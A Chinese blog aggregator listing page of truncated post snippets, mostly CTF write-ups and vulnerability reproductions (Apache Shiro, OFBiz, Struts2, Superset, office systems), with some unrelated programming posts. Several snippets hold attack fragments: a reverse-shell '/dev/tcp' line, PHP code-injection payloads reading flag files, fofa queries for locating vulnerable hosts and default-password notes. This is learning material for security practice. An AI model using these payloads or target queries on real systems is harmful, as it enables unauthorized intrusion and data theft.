CTF赛题复现第30页

BUUCTF--reverse21

这题是一个ELF文件，拉近IDA中查看：主函数流程，flag给了。我们看一下：但是这是假的，下面对这个flag做了一些加密。循环遍历这个flag字符串，当遍历到i或者r将其替换成1。我们将flag改了就行了。最后flag{{hack1ng_fo1_fun}}

call就不要ret·2024-01-29 06:32

BUUCTF--逆向题新年快乐

查壳：有UPX壳的。先脱壳（找个脱壳工具脱掉就行）：接着IDA看逻辑：主函数大概流程flag{HappyNewYear!}

call就不要ret·2024-01-29 06:32

[BUUCTF]PWN——mrctf2020_shellcode_revenge（可见字符shellcode）

mrctf2020_shellcode_revenge例行检查，64位程序，开启了RELRO和PIE本地运行看一下大概的情况64位ida载入，没法f5，直接看汇编jg大于则跳转，jl小于则跳转，jump

Angel~Yan·2024-01-29 06:01

[BUUCTF-pwn]——mrctf2020_shellcode_revenge(可见字符shellcode)(内涵peak小知识)

[BUUCTF-pwn]——mrctf2020_shellcode_revenge(可见字符shellcode)检查了下保护发现NX没有开，肯定要自己写shellcode呀。

Y-peak·2024-01-29 06:29

BUUCTF--mrctf2020_shellcode1

这是一题64位的shellocde题，没啥花招入门题。看下保护：有可执行的段。接着我们看看IDA：主函数中无法反汇编，那么我们直接看汇编代码。其实很简单，通过系统调用执行puts函数，然后执行read函数。正在我想如何覆盖返回地址的时候，发现题目直接帮你搞好了。取buf的的地址（栈上）然后跳转到buf位置执行代码。那么我们直接通过read函数构造shellcode就完成了：frompwnimpor

call就不要ret·2024-01-29 06:57

经典目标检测YOLO系列(三)YOLOv3的复现(2)正样本的匹配、损失函数的实现

经典目标检测YOLO系列(三)YOLOv3的复现(2)正样本的匹配、损失函数的实现我们在之前实现YOLOv2的基础上，加入了多级检测及FPN，快速的实现了YOLOv3的网络架构，并且实现了前向推理过程。

undo_try·2024-01-29 06:33

CTFSHOW ——misc

misc1图片就是答案ctfshow{22f1fb91fc4169f1c9411ce632a0ed8d}misc2打开就是png文件，更改一下后缀跟着学了下pythyon图片提取importpytesseractfromPILimportImage

_Nickname·2024-01-29 05:49

[BJDCTF 2020]Easy

运行之后是这个东西我们直接IDA暴力打开结果main函数啥也不是（看其他人的wp知道了照que函数）我也不知道咋找的，可能真要硬找吧intques(){intv0;//edxintresult;//eaxintv2[50];//[esp+20h][ebp-128h]BYREFintv3;//[esp+E8h][ebp-60h]intv4[10];//[esp+ECh][ebp-5Ch]intj;/

_Nickname·2024-01-29 05:19

CTF新生赛之Writeup

CTF新生赛之Writeup作为零基础的新生，也是在开学后才了解了CTF，感觉本次新生赛中颇有收获，也是应赛制要求，故写下这份WP，以纪念本人的第一次CTF竞赛。

sh1kaku_·2024-01-29 05:48

[SWPUCTF 2022 新生赛]贪吃蛇

那我们就hack吧字符串里面找到了关键信息跟进查看我们刚刚是cantflag那么这个tflag和sflag就是我们需要的先对tflag进行一个操作，然后粘贴进入sflag这是对tflag的操作int__cdecldecode_flag(inta1){intresult;//eaxinti;//[esp+Ch][ebp-4h]for(i=0;i<=30;++i){result=i+a1;*(_BYT

_Nickname·2024-01-29 05:18

红包六（CTFshow）

jar的逆向，第一次接触jd逆向工具反编译jar文件可以直接丢进去看，也可以用jd反汇编工具看这里提示flag不在这里分析一下这段代码1.引入必要的库:java.util.Base64:用于处理Base64编码和解码。java.util.Scanner:用于从用户输入中读取文本。javax.crypto.Cipher:用于加密和解密操作。javax.crypto.spec.SecretKeySpe

Back～～·2024-01-29 04:51

CTF-PWN-堆-【chunk extend/overlapping-2】(hack.lu ctf 2015 bookstore)

文章目录hack.luctf2015bookstore检查IDA源码main函数edit_notedelete_notesubmit.fini_array段劫持(回到main函数的方法)思路python

Full Stack-LLK·2024-01-29 02:32

从零开始做题：逆向 ret2shellcode orw

1.题目信息BUUCTF在线评测下载orw时防病毒要关闭2.题目分析orw是open、read、write的简写。

网络安全我来了·2024-01-29 01:07

从零开始做题：逆向 ret2text level2_x64

1.题目信息BUUCTF在线评测2.解题分析2.1ida发现使用了system函数进行输出2.2gdb无法进行调试root@pwn_test1604:/ctf/work/5#lslevel2_x64level2

网络安全我来了·2024-01-29 01:37

【漏洞复现】中移铁通禹路由器弱口令漏洞

Nx03产品主页hunter-query:title="互联世界物联未来-登录"Nx04漏洞复现使用默认弱口令admin进行登录。Nx05修复建议建议

晚风不及你ღ·2024-01-29 01:59

【漏洞复现】中移铁通禹路由器信息泄露漏洞

Nx03产品主页hunter-query:title="互联世界物联未来-登录"Nx04漏洞复现POC：/cgi-bin/ExportSe

晚风不及你ღ·2024-01-29 01:59

二叉树

目录1翻转二叉树2对称二叉树3二叉树的深度最大深度最小深度4二叉树的结点数量完全二叉树的结点数量5平衡二叉树6中序后序求前序二叉树结构体如下：structfreenode{intdata;structfreenode

3分人生·2024-01-28 22:03

使用NVM安装升级PNPM报错的问题

情景复现：使用命令直接升级会抛出一个诡异的异常找不到模块Error:Cannotfindmodule'C:\Users\Flynn\AppData\Roaming\npm\pnpm-global\5\node_modules

您的小透明·2024-01-28 22:41

Solidity-030 ForLoop

MITpragmasolidity^0.8.9;//ThisisaSoliditysmartcontractexamplethatdemonstratestheuseofaforlooptoemitevents.contractForLoopExample

DataSummer·2024-01-28 21:08

Solidity: 032 LoopContinue

VersionoftheSoliditycompilertobeusedforcompilationpragmasolidity^0.8.9;//ContractdefinitionfortheForLoopExampleContinuecontractForLoopExampleContinue

DataSummer·2024-01-28 21:08

vue项目中echarts自适应问题高级解决方案

1.2问题复现点击浏览器右上角的向下还原按钮后，图表显示不正

xiahuaxuanlan1113·2024-01-28 21:01

蓝凌OA系统任意文件读取

本文为工作中遇到的漏洞，文章为自己复现做的相关笔记，参考了很多前人的资料，只是做个笔记。一、漏洞描述深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。

maverickpig·2024-01-28 21:42

企语iFair协同管理系统getuploadimage.jsp接口存在任意文件读取漏洞CVE-2023-47473

1.企语iFair协同管理系统简介微信公众号搜索：南风漏洞复现文库该文

sublime88·2024-01-28 21:42

漏洞复现-万户OA text2Html 任意文件读取（附漏洞检测脚本）

免责声明文章中涉及的漏洞均已修复，敏感信息均已做打码处理，文章仅做经验分享用途，切勿当真，未授权的攻击属于非法行为！文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任，一旦造成后果请自行负责漏洞描述万户OAtext2Html接口存在任意文件读取漏洞，可读取系统配置文件。fofa语句app="万户网络-ezO

炼金术师诸葛亮·2024-01-28 21:41

BUUCTF[SUCTF2018]single dog解题方法

BUUCTF[SUCTF2018]singledog打开题目，发现有一张图片，先下载下来使用foremost分离一下这张图片得到两个文件夹和一个txt遍历后发现zip里面有一个压缩包里面有一个txt如下图这段内容看起来类似我们平常使用的颜文字表情包

旺仔Sec·2024-01-28 20:45

记录一道ctf web题

0x00前言某同学发在群里一道不知道什么ctf的web题0x01bypassopen_basedir开始没想那么多，看到了可以执行phpinfo，直接先eval一个一句话上去看看什么情况：接着发现了没有权限去读取

程序员七海·2024-01-28 20:28

AAAI最佳论文Informer 复现（含python notebook代码）

AAAI最佳论文Informer解读（含pythonnotebook代码）1代码运行顺序2复现2.1复现结果2.2复现代码3未完待续2023/11/22Github论文源码由于很菜，零基础看源码的时候喜欢按照代码运行的顺序来跑一遍一个

fluentn·2024-01-28 19:22

实验吧web-上传绕过

题目地址：http://ctf5.shiyanbar.com/web/upload/一道上传绕过题目，先上传个php文件看看然后上传个正常的jpg文件试试要求上传后的文件在读取时的后缀名要是php，我们可以使用

Aluvion·2024-01-28 18:33

CTF CRYPTO 密码学-7

题目名称：敲击题目描述：让我们回到最开始的地方011001100110110001100001011001110111101101100011011001010011001101100101001101010011000000110010011000110010110100110100001110000110001100111001001011010011010001100100001101010

Brucye·2024-01-28 17:58

CTF CRYPTO 密码学-8

-------…解题过程：Step1：解码简介CTF（CaptureTheFlag）比赛中的密码学部分通常涉及各种加密和编码技术，摩尔斯电码（Morse

Brucye·2024-01-28 17:55

SQL语言共分为几大类：数据查询语言DQL，数据操纵语言DML，数据定义语言DDL，数据控制语言DCL，事务控制语句TCL

数据查询语言DQL数据查询语言DQL基本结构是由SELECT子句，FROM子句，WHERE子句组成的查询块：SELECTFROMWHERE数据操纵语言DML数据操纵语言DML主要有三种形式：1)插入：INSERT2

小二_6b37·2024-01-28 16:45

复现PointRCNN

环境要求～／work/object_detection/PointRCNN-master/https://github.com/sshaoshuai/PointRCNNcondaactivatepointrcnnLinux(testedonUbuntu14.04/16.04)Python3.6PyTorch1.0依赖包easydict、tqdm、tensorboardX、fire、numba、py

SIATdog·2024-01-28 16:48

Kotlin 协程库v1.7.1的核心模块（kotlinx-coroutines-core）-- kotlinx.coroutines.flow篇

目录AbstractFlowasFlowasSharedFlowasStateFlowbuffercallbackFlowcancellablecatchchannelFlowcollectcollectIndexedcollectLatestcombinecombineTransformconflateconsumeAsFlowcou

小铁-Android·2024-01-28 15:29

CTFmisc-------Jack

1.下载得到Jack文件夹，里面有很多的txt文件每一个文件里面都有不一样的base64编码，我尝试将其解密，发现解出来的是乱码，所以我想到真正的flag藏在这些字符串中，所以我们要写代码把字符串提取出来importos#定义要读取的文件夹路径folder_path=r'C:\Users\Desktop\下载\Jack'#获取文件夹中的所有文件名file_names=os.listdir(fold

郑居中3.0·2024-01-28 15:16

墨者学院-Apache Struts2远程代码执行漏洞(S2-013)复现

靶场地址：https://www.mozhe.cn/bug/detail/S0NiS2JMeTZUTVg3RXdMYzdqWTBQUT09bW96aGUmozhe漏洞编号：CVE-2013-1966影响范围：Struts2.0.0-Struts2.3.14漏洞原理：s:url和s:a标记都提供includeparams属性。该属性的主要作用域是了解包含或不包含http://request参数的内容

nohands_noob·2024-01-28 15:08

ctfer测试自搭建靶场必须学会！

自己搭建靶场测试题目是ctfer不可避免的环节，怎么用burp对本地回环即localhost进行抓包？笔者在本篇分享一下自己的解决经验。

晴友读钟·2024-01-28 14:10

superset未授权访问漏洞（CVE-2023-27524）复现

Superset是一个开源的数据探索和可视化平台。它由Apache软件基金会支持，旨在帮助用户通过直观的方式探索、分析和可视化复杂的数据集。Superset支持多种数据源，包括关系型数据库、NoSQL数据库和各种其他数据存储系统。ApacheSuperset2.0.1版本及之前版本存在安全漏洞。攻击者利用该漏洞验证和访问未经授权的资源。1.漏洞级别高危2.漏洞搜索fofatitle="Supers

fly夏天·2024-01-28 14:08

Redash 默认key漏洞（CVE-2021-41192）复现

1.漏洞级别中危2.漏洞搜索fofa"redash"3.影响范围Redash<10.0.04.漏洞复现漏洞的产生主要原因是由于redash这个项目的token生成方式存在默认key，如果用

fly夏天·2024-01-28 14:08

Apache OFBiz groovy 远程代码执行漏洞（CVE-2023-51467）复现

ApacheOFBizgroovy远程代码执行漏洞，攻击者可构造请求绕过身份认证，利用后台相关接口功能执行groovy代码，导致远程代码执行。1.漏洞级别高危2.漏洞搜索fofaapp="Apache_OFBiz"3.影响范围ApacheOFBiz&/dev/tcp/ip/port0>&1注：反弹shell很可能会触发安全机制导致反弹失败。

fly夏天·2024-01-28 14:38

Office365-Indexs-任意文件读取

指纹特征fofa:header="OfficeWeb365"||body="请输入furl参数"hunter:header="OfficeWeb365"||web.body="请输入furl参数"漏洞复现

LZsec·2024-01-28 14:37

officeWeb365 Indexs接口存在任意文件读取漏洞复现

OfficeWeb365是专注于Office文档在线预览及PDF文档在线预览云服务，包括MicrosoftWord文档在线预览、Excel表格在线预览、Powerpoint演示文档在线预览，WPS文字处理、WPS表格、WPS演示及AdobePDF文档在线预览。OfficeWeb365/Pic/Indexs接口处存在任意文件读取漏洞，攻击者可通过独特的加密方式对payload进行加密，读取任意文件，

fly夏天·2024-01-28 14:35

Kaggle新赛：HMS-有害大脑活动分类大赛（信号分类）

赛题名称：HMS-HarmfulBrainActivityClassification赛题链接：https://www.kaggle.com/competitions/hms-harmful-brain-activity-classification

深度之眼·2024-01-28 13:16

漏洞复现 - Apache Shiro 1.2.4反序列化漏洞（CVE-2016-4437）

漏洞原理ApacheShiro是Java的一个安全框架，可以帮助我们完成：认证、授权、加密、会话管理、与Web集成、缓存等功能，应用十分广泛。Shiro最有名的漏洞就是反序列化漏洞了，加密的用户信息序列化后存储在名为remember-me的Cookie中，攻击者使用Shiro的默认密钥伪造用户Cookie，触发Java反序列化漏洞，进而在目标机器上执行任意命令。这里最关键的切入点就是默认密钥了，这

Sally__Zhang·2024-01-28 13:15

Apache Shiro 1.2.4反序列化漏洞（CVE-2016-4437）

目录ApacheShiro简介漏洞原理影响版本漏洞复现声明：本文仅供学习参考，其中涉及的一切资源均来源于网络，请勿用于任何非法行为，否则您将自行承担相应后果，本人不承担任何法律及连带责任。

Passer798·2024-01-28 13:14

Apache Shiro ＜= 1.2.4反序列化漏洞攻击 CVE-2016-4437 已亲自复现

ApacheShiro<=1.2.4反序列化漏洞攻击CVE-2016-4437已亲自复现漏洞名称漏洞描述影响版本漏洞复现环境搭建漏洞利用修复建议总结漏洞名称漏洞描述在1.2.5之前的ApacheShiro

Bolgzhang·2024-01-28 13:41

[SparkSQL] Rdd转化DataFrame 通过StructType为字段添加Schema

DataFrame，为字段添加列信息参数nullable说明：Indicatesifvaluesofthisfieldcanbenullvaluesvalschema=StructType(List(StructField

林沐之森·2024-01-28 13:51

第十届南京邮电大学网络攻防大赛(NCTF 2021)writeup

WebX1cT34m_API_SystemAuthor：wh1sper题目描述：在API安全的新时代，安全圈迎来风云变幻。掀起巨浪的你？只手遮天的你？选择保护还是放弃你的曾经的伙伴？target:http://129.211.173.64:58082/附件链接：https://wwn.lanzoui.com/iUoDwwyfdxchint1:thehiddenAPItobypass403hint2

渗透测试中心·2024-01-28 13:19

ctfshow web71

前置知识点:ob_get_contents()：得到输出缓冲区的内容。ob_end_clean()：清除缓冲区的内容，并将缓冲区关闭，但不会输出内容。preg_replace()：执行一个正则表达式的搜索和替换。exit()：输出一个消息并且退出当前脚本。下载源码打开:开启环境:c=var_export(scandir("/"));exit();c=include("/flag.txt");exi

郭与童·2024-01-28 13:45

ctfshow web75

>c=try{$dbh=newPDO('mysql:host=localhost;dbname=ctftraining','root','root');foreach($dbh->query('selectload_file

郭与童·2024-01-28 13:12

React16源码: React中commit阶段的commitAllLifeCycles的源码实现

commitRoot第三个while循环中处理了生命周期相关的一些内容它这个方法的名字叫做commitAllLifeCycles2）源码定位到packages/react-reconciler/src/ReactFiberScheduler.js

Wang's Blog·2024-01-28 12:40

推荐频道

CTF赛题复现